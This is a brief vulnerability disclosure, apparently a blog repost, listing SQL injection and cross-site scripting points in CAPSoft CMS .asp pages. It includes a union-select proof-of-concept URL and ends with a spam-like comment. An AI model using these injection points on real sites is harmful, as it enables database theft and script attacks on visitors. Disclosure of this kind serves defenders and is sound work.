CAPSoft CMS Multiple Vulnerabilities
Title : CAPSoft CMS Multiple Vulnerabilities
Vendor : http://www.capsoft.com.ar
Found by : p0pc0rn
SQL
---
Vulnerable Parameters are
Method = GET
------------
http://site.com/noticia.asp?id=[SQL]
http://site.com/imprimir.asp?tabla=[content_name]&id=[SQL]
http://site.com/product.asp?intProdID=[SQL]
http://site.com/productosporcategoria.asp?intCatalogID=[SQL]
POC
---
http://site.com/noticia.asp?id=1 union select 0 from test.a
Method = POST
-------------
buscador.asp
ingresar.asp
XSS
---
http://site.com/diseno_web.asp?pcia=[XSS]
http://site.com/productosporcategoria.asp?intCatalogID=[id_number]&strCatalog_NAME=[XSS]
thanks,
-p0pc0rn-
1 comments:
agregame, dixpoint@gmail.com Bisness :D
Post a Comment